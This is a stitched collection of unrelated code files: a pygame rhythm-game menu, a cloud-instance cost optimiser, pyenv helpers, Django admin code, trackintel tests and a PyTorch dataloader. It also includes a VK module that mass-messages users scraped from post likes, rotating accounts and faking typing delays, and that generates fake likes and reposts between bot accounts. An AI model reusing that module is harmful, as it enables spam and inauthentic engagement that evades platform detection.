True, Menu.ENABLED_COLOR if self.layers_keys["A"][0] else Menu.DISABLED_COLOR)
A_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["A"][1] is None else pygame.key.name(self.layers_keys["A"][1])}', True, Menu.WHITE)
self.screen.blit(A_label, (25, 350))
self.screen.blit(A_enabled_label, (175, 350))
self.screen.blit(A_key_label, (325, 350))
# B layer
B_label = self.generic_font.render('Layer B:', True, Menu.SELECTED_COLOR if label_selection_index == 3 else Menu.WHITE)
B_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["B"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["B"][0] else Menu.DISABLED_COLOR)
B_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["B"][1] is None else pygame.key.name(self.layers_keys["B"][1])}', True, Menu.WHITE)
self.screen.blit(B_label, (25, 425))
self.screen.blit(B_enabled_label, (175, 425))
self.screen.blit(B_key_label, (325, 425))
# C layer
C_label = self.generic_font.render('Layer C:', True, Menu.SELECTED_COLOR if label_selection_index == 4 else Menu.WHITE)
C_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["C"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["C"][0] else Menu.DISABLED_COLOR)
C_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["C"][1] is None else pygame.key.name(self.layers_keys["C"][1])}', True, Menu.WHITE)
self.screen.blit(C_label, (25, 500))
self.screen.blit(C_enabled_label, (175, 500))
self.screen.blit(C_key_label, (325, 500))
# D layer
D_label = self.generic_font.render('Layer D:', True, Menu.SELECTED_COLOR if label_selection_index == 5 else Menu.WHITE)
D_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["D"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["D"][0] else Menu.DISABLED_COLOR)
D_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["D"][1] is None else pygame.key.name(self.layers_keys["D"][1])}', True, Menu.WHITE)
self.screen.blit(D_label, (25, 575))
self.screen.blit(D_enabled_label, (175, 575))
self.screen.blit(D_key_label, (325, 575))
# E layer
E_label = self.generic_font.render('Layer E:', True, Menu.SELECTED_COLOR if label_selection_index == 6 else Menu.WHITE)
E_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["E"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["E"][0] else Menu.DISABLED_COLOR)
E_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["E"][1] is None else pygame.key.name(self.layers_keys["E"][1])}', True, Menu.WHITE)
self.screen.blit(E_label, (25, 650))
self.screen.blit(E_enabled_label, (175, 650))
self.screen.blit(E_key_label, (325, 650))
# F layer
F_label = self.generic_font.render('Layer F:', True, Menu.SELECTED_COLOR if label_selection_index == 7 else Menu.WHITE)
F_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["F"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["F"][0] else Menu.DISABLED_COLOR)
F_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["F"][1] is None else pygame.key.name(self.layers_keys["F"][1])}', True, Menu.WHITE)
self.screen.blit(F_label, (25, 725))
self.screen.blit(F_enabled_label, (175, 725))
self.screen.blit(F_key_label, (325, 725))
self.screen.blit(self.setup_toggle, (self.width - 450, self.height - 30))
self.screen.blit(self.setup_back, (self.width - 150, self.height - 30))
pygame.display.flip()
self.clock.tick(30)
def draw_new_track(self):
label_selection_index = 0
clipboard = paste()
new_track_filepath = clipboard if isfile(clipboard) and clipboard[clipboard.rindex('.'):] in ('.flac', '.opus', '.mp3', '.m4a') else None
new_track = Track(new_track_filepath) if new_track_filepath else None
while 1:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
if label_selection_index == 0:
clipboard = paste()
new_track_filepath = clipboard if isfile(clipboard) and clipboard[clipboard.rindex('.'):] in ('.flac', '.opus', '.mp3', '.m4a') else None
new_track = Track(new_track_filepath) if new_track_filepath else None
break
elif label_selection_index == 1:
new_track.set_title(paste())
break
elif label_selection_index == 2:
new_track.set_artist(paste())
break
elif label_selection_index == 3:
new_track.set_album(paste())
break
elif event.key == pygame.K_s:
self.current_screen = Menu.TRACK_SELECT
if new_track:
new_index = self.library.add_track(new_track)
self.save_library()
if new_index is not None:
self.track_selection_index = new_index
self.selected_tracks = self.library.get_tracks(self.track_selection_index)
self.render_selected_tracks()
self.render_selected_track_data()
return
elif event.key == pygame.K_BACKSPACE:
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_DOWN:
label_selection_index = min(3, label_selection_index + 1)
break
elif event.key == pygame.K_UP:
label_selection_index = max(0, label_selection_index - 1)
break
if self.redraw_screen:
self.screen.fill((0, 0, 0))
new_track_file_text = self.generic_font.render('Paste filepath from clipboard', True,
Menu.SELECTED_COLOR if label_selection_index == 0 else Menu.WHITE)
new_track_file_text_box = new_track_file_text.get_rect()
new_track_file_text_box.center = self.width / 2, 200
self.screen.blit(new_track_file_text, new_track_file_text_box)
clipboard = paste()
new_track_clipboard_text = self.small_font.render(f'Clipboard: {clipboard}', True, Menu.WHITE)
self.screen.blit(new_track_clipboard_text, (10, self.height - 200))
self.screen.blit(self.new_track_edit, (15, self.height - 30))
self.screen.blit(self.new_track_save, (self.width - 300, self.height - 30))
self.screen.blit(self.new_track_cancel, (self.width - 150, self.height - 30))
self.screen.blit(self.generic_font.render(f'Title: {new_track.title if new_track else "None"}', True, Menu.SELECTED_COLOR if label_selection_index == 1 else Menu.WHITE), (10, 300))
self.screen.blit(self.generic_font.render(f'Artist: {new_track.artist if new_track else "None"}', True, Menu.SELECTED_COLOR if label_selection_index == 2 else Menu.WHITE), (10, 375))
self.screen.blit(self.generic_font.render(f'Album: {new_track.album if new_track else "None"}', True, Menu.SELECTED_COLOR if label_selection_index == 3 else Menu.WHITE), (10, 450))
pygame.display.flip()
self.clock.tick(30)
    def draw_edit_track(self):
        """Screen loop for editing the selected track's metadata.

        Enter pastes clipboard text into the highlighted field, 'd' deletes the
        track and its beat map, 's' saves (re-inserting the track if the title
        changed), and backspace cancels, restoring the original metadata.
        """
        label_selection_index = 0  # 0=title, 1=artist, 2=album
        # NOTE(review): index 3 appears to be the focused track of the selection
        # window — confirm against render_selected_tracks().
        track = self.selected_tracks[3]
        # Remember original metadata so a cancel (backspace) can restore it.
        old_title = track.title
        old_artist = track.artist
        old_album = track.album
        while 1:
            for event in pygame.event.get():
                if event.type == pygame.KEYDOWN:
                    if event.key == pygame.K_RETURN:
                        # Paste clipboard text into the selected field.
                        if label_selection_index == 0:
                            track.set_title(paste())
                            break
                        elif label_selection_index == 1:
                            track.set_artist(paste())
                            break
                        elif label_selection_index == 2:
                            track.set_album(paste())
                            break
                    elif event.key == pygame.K_d:
                        # Delete the track, then return to track selection.
                        track.delete_map()
                        self.library.remove_track(self.track_selection_index)
                        self.save_library()
                        # Clamp the selection if the last track was removed.
                        if self.track_selection_index >= len(self.library.saved_tracks):
                            self.track_selection_index -= 1
                        self.selected_tracks = self.library.get_tracks(self.track_selection_index)
                        self.render_selected_tracks()
                        self.render_selected_track_data()
                        self.current_screen = Menu.TRACK_SELECT
                        return
                    elif event.key == pygame.K_s:
                        if track.title != old_title:
                            # Remove and re-add so the library re-sorts by the new title.
                            self.library.add_track(self.library.remove_track(self.track_selection_index))
                        self.save_library()
                        self.render_selected_tracks()
                        self.render_selected_track_data()
                        self.current_screen = Menu.TRACK_SELECT
                        return
                    elif event.key == pygame.K_BACKSPACE:
                        # Cancel: restore the metadata captured on entry.
                        track.set_title(old_title)
                        track.set_artist(old_artist)
                        track.set_album(old_album)
                        self.current_screen = Menu.TRACK_SELECT
                        return
                    elif event.key == pygame.K_DOWN:
                        label_selection_index = min(2, label_selection_index + 1)
                        break
                    elif event.key == pygame.K_UP:
                        label_selection_index = max(0, label_selection_index - 1)
                        break
            if self.redraw_screen:
                self.screen.fill((0, 0, 0))
                clipboard = paste()
                edit_track_clipboard_text = self.small_font.render(f'Clipboard: {clipboard}', True, Menu.WHITE)
                self.screen.blit(edit_track_clipboard_text, (10, self.height - 200))
                self.screen.blit(self.new_track_edit, (15, self.height - 30))
                self.screen.blit(self.edit_track_delete, (400, self.height - 30))
                self.screen.blit(self.new_track_save, (self.width - 300, self.height - 30))
                self.screen.blit(self.new_track_cancel, (self.width - 150, self.height - 30))
                self.screen.blit(self.generic_font.render(f'Title: {track.title}', True, Menu.SELECTED_COLOR if label_selection_index == 0 else Menu.WHITE), (10, 300))
                self.screen.blit(self.generic_font.render(f'Artist: {track.artist}', True, Menu.SELECTED_COLOR if label_selection_index == 1 else Menu.WHITE), (10, 375))
                self.screen.blit(self.generic_font.render(f'Album: {track.album}', True, Menu.SELECTED_COLOR if label_selection_index == 2 else Menu.WHITE), (10, 450))
            pygame.display.flip()
            self.clock.tick(30)
    def draw_search(self):
        """Search screen placeholder; not implemented yet."""
        pass
def display_loop(self):
while 1:
self.screen_calls[self.current_screen]()
if self.current_screen == 0:
break
def play_track(self, track):
if isfile(track.audio_filepath) and isfile(track.map_filepath):
self.audio_player.idle.wait()
enabled_layers_keys = {layer: key[1] for layer, key in self.layers_keys.items() if key[0]}
game = Game(self.screen, self.width, self.height, self.audio_player, track, enabled_layers_keys, self.preview_length, self.lenience, self.prune_unused_layers, self.latency, self.play_hit_sound, [self.bass_hit_sound_data, self.high_hit_sound_data])
game.start_game()
while game.restart:
self.audio_player.idle.wait()
game = Game(self.screen, self.width, self.height, self.audio_player, track, enabled_layers_keys, self.preview_length, self.lenience, self.prune_unused_layers, self.latency, self.play_hit_sound, [self.bass_hit_sound_data, self.high_hit_sound_data])
game.start_game()
self.save_library()
self.render_selected_track_data()
def save_library(self):
dump(self.library, open('library/saved.library', 'wb'))
    def close_menu(self):
        """Persist the library, wait for audio playback to finish, and shut down the display."""
        self.save_library()
        # Block until the audio player is idle before closing it.
        self.audio_player.idle.wait()
        self.audio_player.close()
        pygame.display.quit()
| StarcoderdataPython |
1976590 | <gh_stars>1-10
import pandas as pd
from pulp import *
def remove_prefix(text, prefix):
    """Return *text* with a leading *prefix* stripped; unchanged if absent."""
    return text[len(prefix):] if text.startswith(prefix) else text
def best_reco(required_resources, instance_df):
    """Solve a small integer LP picking the cheapest instance mix.

    Minimizes total price subject to meeting the 'vcpus' and 'memory'
    requirements in *required_resources*; returns a DataFrame of chosen
    instances (with unit counts) merged back onto *instance_df*.
    """
    problem = LpProblem("InstanceRecommender", LpMinimize)
    names = instance_df['name'].values
    # Per-instance spec lookup: name -> {price, vcpus, memory, ...}.
    specs = instance_df.set_index('name').T.to_dict()
    units = LpVariable.dicts(
        "Instance", names, lowBound=0, cat='Integer')
    # Objective: total price of the selected units.
    problem += lpSum([specs[n]['price'] * units[n] for n in names])
    # Capacity constraints.
    problem += lpSum([specs[n]['vcpus'] * units[n] for n in names]) >= required_resources['vcpus']
    problem += lpSum([specs[n]['memory'] * units[n] for n in names]) >= required_resources['memory']
    problem.solve()
    print("Status:", LpStatus[problem.status])
    chosen = pd.DataFrame([
        {'name': remove_prefix(v.name, "Instance_"), 'units': v.varValue}
        for v in problem.variables() if v.varValue > 0]
    )
    return chosen.merge(instance_df)
| StarcoderdataPython |
3465386 | import vk_api, time, random
from server_logout import Client_output, Logs
class Vk_accounts:
    """Bulk helpers for driving VK accounts through stored access tokens.

    All methods intentionally omit ``self`` and are meant to be invoked on the
    class itself (e.g. ``Vk_accounts.read_file_token(...)``), preserving the
    original calling convention.
    """
    def read_file_token(file_name):
        """Read one token per line from *file_name* and validate each via the VK API.

        Returns a list of ``[token, first_name, last_name, user_id]`` entries
        for tokens that authorize successfully, or ``None`` if the file cannot
        be opened.
        """
        try:
            file = open(file_name, 'r')
        except OSError:
            # The original closed a handle that was never opened (NameError);
            # simply report failure instead.
            return None
        accounts = []
        for line in file.readlines():
            token = line.split()[0]
            try:
                autoris = vk_api.VkApi(token= token)
                vk = autoris.get_api()
                info = vk.account.getProfileInfo()
                accounts.append([token, info['first_name'], info['last_name'], info['id']])
                vk.account.setOnline(voip = 0)
            except:
                # Skip tokens that fail to authorize.
                pass
        file.close()
        return accounts
    def write_file_token(file_name, token, list_adding, list, addr):
        """Validate *token*, append it to *file_name*, and optionally extend *list*.

        *addr* is accepted for interface compatibility but unused. Returns the
        (possibly extended) account list, or ``None`` on failure or when the
        token is already registered.
        """
        try:
            for acc in list:
                if token == acc[0]:
                    Client_output.message('ACCOUNT HAD ALREADY ADDED')
                    return None
        except:
            pass
        try:
            autoris = vk_api.VkApi(token= token)
            vk = autoris.get_api()
            info = vk.account.getProfileInfo()
            vk.account.setOnline(voip = 0)
            # Mode 'a' creates the file when it is missing, so no 'w' fallback
            # is needed; the context manager guarantees the handle is closed.
            with open(file_name, 'a') as file:
                file.write(token+'\n')
        except Exception as e:
            Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'write_file_token'])
            # Token could not be validated: bail out instead of crashing on the
            # undefined `info` as the original did.
            return None
        if list_adding:
            list.append([token, info['first_name'], info['last_name'], info['id']])
        return list
    def accounts_messages(account_list, num_of_messages, is_user_only, message_list):
        """Collect conversation peer ids of recent messages for every account.

        Returns the collected ids (the original built the list per account,
        overwrote it each iteration and never returned it).
        """
        message_list = []
        for acc in account_list:
            autoris = vk_api.VkApi(token= acc[0])
            vk = autoris.get_api()
            vk.account.setOnline(voip = 0)
            messages = vk.messages.getConversations(count = num_of_messages)
            for message in messages.get('items'):
                peer = message.get('conversation').get('peer')
                # Optionally keep only person-to-person conversations.
                if not is_user_only or peer.get('type') == 'user':
                    message_list.append(peer.get('id'))
        return message_list
    def accounts_groups(account_list, num_of_groups, group_list):
        """Return ``[id, name]`` pairs for groups of the first account in *account_list*."""
        autoris = vk_api.VkApi(token= account_list[0][0])
        vk = autoris.get_api()
        vk.account.setOnline(voip = 0)
        groups = vk.groups.get(user_id = account_list[0][3], extended = 1, count = num_of_groups)
        group_list = []
        for group in groups.get('items'):
            group_list.append([group.get('id'), group.get('name')])
        return group_list
    def group_posts(account_list, group_ids, num_of_posts, post_list, newest = False):
        """Fetch wall posts for each group id.

        Returns entries of the form ``[[[post_id, date], ...], group_id]``.
        With ``newest`` only the most recent post is kept per group,
        accounting for a pinned post listed first.
        """
        post_list = []  # accumulate across groups (the original reset this per group)
        for id in group_ids:
            autoris = vk_api.VkApi(token= account_list[0][0])
            vk = autoris.get_api()
            vk.account.setOnline(voip = 0)
            posts = vk.wall.get(owner_id = '-'+str(id), count = num_of_posts, filter = 'owner')
            items = posts.get('items')
            if newest:
                newest_post = [items[0].get('id'), items[0].get('date')]
                # A pinned post may be listed first: prefer the second post when
                # it is newer. (The original compared `buffer_post[0][1]`,
                # indexing into an int, which raised TypeError.)
                if num_of_posts > 1 and len(items) > 1 and newest_post[1] < items[1].get('date'):
                    newest_post = [items[1].get('id'), items[1].get('date')]
                buffer_post = [newest_post]
            else:
                buffer_post = []
                for post in items:
                    buffer_post.append([post.get('id'), post.get('date')])
            post_list.append([buffer_post, id])
        return post_list
    def likes(account_list, post_list, user_id, unquie_users = True, protected_id = 0):
        """Collect ids of users who liked the given posts.

        With *unquie_users* every id appears at most once and members of the
        *protected_id* group are filtered out.
        """
        user_id = []  # accumulate across posts (the original reset this per post)
        for posts in post_list:
            for post in posts[0]:
                autoris = vk_api.VkApi(token= account_list[0][0])
                vk = autoris.get_api()
                vk.account.setOnline(voip = 0)
                likes = vk.likes.getList(type = 'post', owner_id = '-'+str(posts[1]), item_id = post[0], extended = 0, count = 1000, skip_own = 1)
                try:
                    if unquie_users:
                        for like in likes.get('items'):
                            if like not in user_id:
                                user_id.append(like)
                        try:
                            # Iterate a copy: removing from the list being
                            # iterated over skips elements.
                            # NOTE(review): group_id is passed with a '-'
                            # prefix; confirm the VK API expects that here.
                            for id in user_id[:]:
                                if vk.groups.isMember(group_id = '-'+str(protected_id), user_id = str(id)):
                                    user_id.remove(id)
                        except:
                            pass
                    else:
                        for like in likes.get('items'):
                            user_id.append(like)
                except:
                    pass
        return user_id
    def send_messages(account_list, like_list, message, count, sleep_time = 5, only_new = True, message_list = None):
        """Send *message* to up to *count* users from *like_list*, rotating accounts.

        With *only_new*, users already present in *message_list* are skipped.
        Successful and failed sends are recorded via ``Logs.user_list``.
        """
        if message_list is None:
            message_list = []
        if only_new:
            # Iterate a copy: removing while iterating skips elements.
            for like in like_list[:]:
                if like in message_list:
                    like_list.remove(like)
        mes = 0
        send_mes = 0
        while send_mes < count:
            for acc in account_list:
                if mes >= len(like_list):
                    # Ran out of recipients (the original raised IndexError
                    # inside its own except handler here).
                    return
                autoris = vk_api.VkApi(token= acc[0])
                vk = autoris.get_api()
                try:
                    vk.account.setOnline(voip = 0)
                    vk.messages.setActivity(user_id = like_list[mes], type = 'typing')
                    time.sleep(random.randint(0,10))
                    vk.messages.send(user_id = like_list[mes], message = message, random_id = random.randint(1, 32000))
                    send_mes += 1
                    Logs.user_list(like_list[mes])
                except Exception as e:
                    Logs.user_list(like_list[mes], Succes = False, error = e)
                time.sleep(sleep_time)
                mes += 1
                if send_mes == count:
                    break
            if(send_mes >= 20 * len(account_list)):
                break
    def post_on_wall(account_info, group_id):
        """Repost a random recent group post (not already reposted) to the account's wall."""
        autoris = vk_api.VkApi(token = account_info[0])
        vk = autoris.get_api()
        try:
            vk.account.setOnline(voip = 0)
            group_posts = vk.wall.get(owner_id = '-'+str(group_id), count = 10, filter = 'owner')
            posts_ids = []
            for id in group_posts.get('items'):
                posts_ids.append(id.get('id'))
            # Drop posts the account has already reposted.
            user_posts = vk.wall.get(owner_id = str(account_info[3]), count = 100)
            for id in user_posts.get('items'):
                if id.get('id') in posts_ids:
                    posts_ids.remove(id.get('id'))
            # random.choice avoids the off-by-one IndexError of
            # randint(0, len(posts_ids)) in the original.
            vk.wall.repost(object = 'wall-{0}_{1}'.format(str(group_id), str(random.choice(posts_ids))))
        except Exception as e:
            Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'post_on_wall'])
    def send_to_friend(account_list, account_info, send_post = False, message = '', group_id = 0 ):
        """Send *message* (optionally with a random group post attached) to a random other account."""
        autoris = vk_api.VkApi(token = account_info[0])
        vk = autoris.get_api()
        if send_post:
            vk.account.setOnline(voip = 0)
            group_posts = vk.wall.get(owner_id = '-'+str(group_id), count = 10, filter = 'owner')
            posts_ids = []
            for id in group_posts.get('items'):
                posts_ids.append(id.get('id'))
        while True:
            # Pick a random account other than the sender.
            # NOTE(review): loops forever if account_list only contains the sender.
            friend_id = account_list[random.randint(0, len(account_list)-1)][3]
            if friend_id == account_info[3]:
                continue
            vk.account.setOnline(voip = 0)
            if send_post:
                print(str(friend_id))
                vk.messages.setActivity(user_id = str(friend_id), type = 'typing')
                time.sleep(random.randint(0,10))
                # random.choice avoids the off-by-one IndexError of
                # randint(0, len(posts_ids)) in the original.
                vk.messages.send(user_id = str(friend_id), message = message, attachment = 'wall-{0}_{1}'.format(str(group_id), str(random.choice(posts_ids))), random_id = random.randint(1, 32000))
            else:
                vk.messages.send(user_id = str(friend_id), message = message, random_id = random.randint(1, 32000))
            break
    def set_like(account_info, group_id , post_id):
        """Like a single group wall post on behalf of *account_info*."""
        try:
            autoris = vk_api.VkApi(token = account_info[0])
            vk = autoris.get_api()
            vk.account.setOnline(voip = 0)
            vk.likes.add(owner_id = '-'+str(group_id), item_id = str(post_id), type = 'post')
        except Exception as e:
            Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'set_like'])
    def answer_on_message(account_list, account_info, latency = 5, message = ''):
        """Reply with *message* to unread conversations whose last message is a wall-post attachment."""
        autoris = vk_api.VkApi(token = account_info[0])
        vk = autoris.get_api()
        vk.account.setOnline(voip = 0)
        messages = vk.messages.getConversations(count = 25, filter = 'unread', extended = 1)
        # Keep only conversations whose last message carries a wall attachment.
        # (The original removed items while iterating, which skips elements.)
        wall_items = []
        for mes in messages.get('items'):
            try:
                if mes.get('last_message').get('attachments')[0].get('type') == 'wall':
                    wall_items.append(mes)
            except:
                pass
        for mes in wall_items:
            for acc in account_list:
                if acc[3] == mes.get('conversation').get('peer').get('id'):
                    time.sleep(latency)
                    vk.account.setOnline(voip = 0)
                    vk.messages.markAsRead(start_message_id = mes.get('conversation').get('last_message_id'))
                    vk.messages.setActivity(user_id = acc[3], type = 'typing')
                    time.sleep(random.randint(0,10))
                    vk.messages.send(user_id = acc[3], message = message, random_id = random.randint(1, 500000))
        if not wall_items:
            # The original compared the response dict against [] / None,
            # which was never true; check the filtered list instead.
            Client_output.message("THERE IS NO ANY MESSAGE")
| StarcoderdataPython |
3254020 | <filename>src/pyenv_inspect/path.py
from __future__ import annotations
import os
from pathlib import Path
from .exceptions import PathError
def get_pyenv_root() -> Path:
    """Resolve the pyenv root directory ($PYENV_ROOT or ~/.pyenv) and validate it."""
    if 'PYENV_ROOT' in os.environ:
        root = Path(os.environ['PYENV_ROOT']).resolve()
    else:
        root = Path.home() / '.pyenv'
    if not root.exists():
        raise PathError(f'pyenv root does not exist: {root}')
    if not root.is_dir():
        raise PathError(f'pyenv root is not a directory: {root}')
    return root
def get_pyenv_versions_directory() -> Path:
    """Return the validated ``versions`` directory under the pyenv root."""
    versions = (get_pyenv_root() / 'versions').resolve()
    if not versions.exists():
        raise PathError(f'pyenv versions path does not exist: {versions}')
    if not versions.is_dir():
        raise PathError(
            f'pyenv versions path is not a directory: {versions}')
    return versions
def get_pyenv_python_executable_path(version_dir: Path) -> Path:
    """Locate and validate the python binary under a pyenv version directory."""
    binary = (version_dir / 'bin' / 'python').resolve()
    if not binary.exists():
        raise PathError(f'pyenv python binary does not exist: {binary}')
    if not binary.is_file():
        raise PathError(f'pyenv python binary is not a file: {binary}')
    if not os.access(binary, os.X_OK):
        raise PathError(f'pyenv python binary is not executable: {binary}')
    return binary
| StarcoderdataPython |
6590636 | <filename>invenio_userprofiles/admin.py<gh_stars>1-10
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Admin views for invenio-userprofiles."""
from __future__ import absolute_import, print_function
from flask_admin.contrib.sqla import ModelView
from .models import UserProfile
def _(x):
    """Identity function; acts as a translation-string marker (no-op gettext)."""
    return x
class UserProfileView(ModelView):
    """Userprofiles view. Links User ID to user/full/display name."""

    # Profiles can be inspected but not created or deleted from the admin;
    # creation/deletion happens through the accounts system.
    can_view_details = True
    can_create = False
    can_delete = False

    # Columns shown in the list view.
    column_list = (
        'user_id',
        '_displayname',
        'full_name',
    )
    # Reuse the same column set for search, filtering, the details page
    # and sorting.
    column_searchable_list = \
        column_filters = \
        column_details_list = \
        columns_sortable_list = \
        column_list
    # Only username and full name are editable via the form.
    form_columns = ('username', 'full_name')
    column_labels = {
        '_displayname': _('Username'),
    }
# Registration descriptor consumed by Invenio-Admin to mount the view
# under the "User Management" category.
user_profile_adminview = {
    'model': UserProfile,
    'modelview': UserProfileView,
    'category': _('User Management'),
}
| StarcoderdataPython |
3319135 | # Generated by Django 3.1.1 on 2020-11-20 17:12
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds an optional ``reportfile`` upload field to Report."""

    dependencies = [
        ('report', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='report',
            name='reportfile',
            # Optional file stored under MEDIA_ROOT/reports/; empty verbose name.
            field=models.FileField(blank=True, null=True, upload_to='reports/', verbose_name=''),
        ),
    ]
| StarcoderdataPython |
1691647 | <filename>tests/analysis/test_label.py
import os
import numpy as np
import pandas as pd
import pytest
import trackintel as ti
from trackintel.analysis.labelling import _check_categories
class TestCreate_activity_flag:
    """Tests for create_activity_flag() method."""

    def test_create_activity_flag(self):
        """Test if 'activity' = True is assigned to staypoints."""
        sp_path = os.path.join("tests", "data", "geolife", "geolife_staypoints.csv")
        staypoints = ti.read_staypoints_csv(sp_path, tz="utc", index_col="id")
        # Wipe the flag, recompute it, and expect the stored values back.
        expected_activity = staypoints["activity"].copy()
        staypoints["activity"] = False
        staypoints = staypoints.as_staypoints.create_activity_flag(method="time_threshold", time_threshold=5.0)
        pd.testing.assert_series_equal(staypoints["activity"], expected_activity)

    def test_wrong_input_parameter(self):
        """Test if an error will be raised when input wrong method."""
        sp_path = os.path.join("tests", "data", "geolife", "geolife_staypoints.csv")
        staypoints = ti.read_staypoints_csv(sp_path, tz="utc", index_col="id")
        # Both a non-string and an unknown string must be rejected.
        for bad_method in (12345, "random"):
            with pytest.raises(AttributeError, match=f"Method {bad_method} not known for creating activity flag."):
                staypoints.as_staypoints.create_activity_flag(method=bad_method)
class TestPredict_transport_mode:
    """Tests for predict_transport_mode() method."""

    def test_wrong_input_parameter(self):
        """Test if an error will be raised when input wrong method."""
        tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
        tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")

        # Both a non-string and an unknown string must be rejected.
        method = 12345
        with pytest.raises(AttributeError, match=f"Method {method} not known for predicting tripleg transport modes."):
            tpls.as_triplegs.predict_transport_mode(method=method)

        method = "random"
        with pytest.raises(AttributeError, match=f"Method {method} not known for predicting tripleg transport modes."):
            tpls.as_triplegs.predict_transport_mode(method=method)

    def test_check_empty_dataframe(self):
        """Assert that the method does not work for empty DataFrames."""
        tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
        tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
        # Zero-row slice keeps the schema but has no data.
        empty_frame = tpls[0:0]
        with pytest.raises(AssertionError):
            empty_frame.as_triplegs.predict_transport_mode(method="simple-coarse")

    def test_simple_coarse_identification_no_crs(self):
        """
        Assert that the simple-coarse transport mode identification throws the correct
        warning and and yields the correct results for WGS84.
        """
        tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
        tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")

        # Without a CRS the implementation warns but assumes WGS84.
        with pytest.warns(
            UserWarning,
            match="The CRS of your data is not defined.",
        ):
            tpls_transport_mode = tpls.as_triplegs.predict_transport_mode(method="simple-coarse")

        # The three fixture triplegs cover one speed band each.
        assert tpls_transport_mode.iloc[0]["mode"] == "slow_mobility"
        assert tpls_transport_mode.iloc[1]["mode"] == "motorized_mobility"
        assert tpls_transport_mode.iloc[2]["mode"] == "fast_mobility"

    def test_simple_coarse_identification_wgs_84(self):
        """Asserts the correct behaviour with data in wgs84."""
        tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
        tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
        # Explicit WGS84 CRS: same classification, no warning expected.
        tpls_2 = tpls.set_crs(epsg=4326)
        tpls_transport_mode_2 = tpls_2.as_triplegs.predict_transport_mode(method="simple-coarse")

        assert tpls_transport_mode_2.iloc[0]["mode"] == "slow_mobility"
        assert tpls_transport_mode_2.iloc[1]["mode"] == "motorized_mobility"
        assert tpls_transport_mode_2.iloc[2]["mode"] == "fast_mobility"

    def test_simple_coarse_identification_projected(self):
        """Asserts the correct behaviour with data in projected coordinate systems."""
        tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
        tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
        # Re-project to a metric CRS (CH1903+/LV95) and expect identical results.
        tpls_2 = tpls.set_crs(epsg=4326)
        tpls_3 = tpls_2.to_crs(epsg=2056)
        tpls_transport_mode_3 = tpls_3.as_triplegs.predict_transport_mode(method="simple-coarse")
        assert tpls_transport_mode_3.iloc[0]["mode"] == "slow_mobility"
        assert tpls_transport_mode_3.iloc[1]["mode"] == "motorized_mobility"
        assert tpls_transport_mode_3.iloc[2]["mode"] == "fast_mobility"

    def test_check_categories(self):
        """Asserts the correct identification of valid category dictionaries."""
        tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
        tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
        # Valid: upper bounds strictly increasing, ending at infinity.
        correct_dict = {2: "cat1", 7: "cat2", np.inf: "cat3"}

        assert _check_categories(correct_dict)

        # Invalid: non-increasing upper bounds must raise.
        with pytest.raises(ValueError):
            incorrect_dict = {10: "cat1", 5: "cat2", np.inf: "cat3"}
            tpls.as_triplegs.predict_transport_mode(method="simple-coarse", categories=incorrect_dict)
| StarcoderdataPython |
3591521 | <filename>dataloaders/dataloader_triplet.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 28 16:05:38 2019
- Dataloader for triplet of graph-data.
- trainset only includes ids that has valid positive-pairs (iou > threshold.) e.g. 0.6
- randomly sample anchors [same as previous]
- for selected anchor, find an positive from positive set (randomly choose if multiple exits)
- To find the negative,
1) randomly choose any image except from the pos list
2) only choose images whose iou is beteen some range (l_iou, h_iou) --> (0.2-0.4)
The higher the iou the harder is the negative.
3) Only choose hard examples just below the postive threshold, and above some iou e.g. (0.4-0.7))
@author: dipu
"""
import torch
from torch.utils.data import Dataset
import torch.utils.data as data
import os
from PIL import Image
from torchvision import transforms
import numpy as np
import random
import pickle
import torch.nn.functional as F
from collections import defaultdict
import random
def default_loader(path):
    """Load the image at *path* with PIL and convert it to RGB."""
    return Image.open(path).convert('RGB')
def pickle_save(fname, data):
    """Pickle *data* into the file *fname* and print a confirmation."""
    with open(fname, 'wb') as out_file:
        pickle.dump(data, out_file)
    print('Saved to {}.'.format(fname))
def pickle_load(fname):
    """Unpickle and return the object stored in *fname*, printing a notice."""
    with open(fname, 'rb') as in_file:
        loaded = pickle.load(in_file)
    print('Loaded {}.'.format(fname))
    return loaded
#%%
class PSGraphTripletDataset(Dataset):
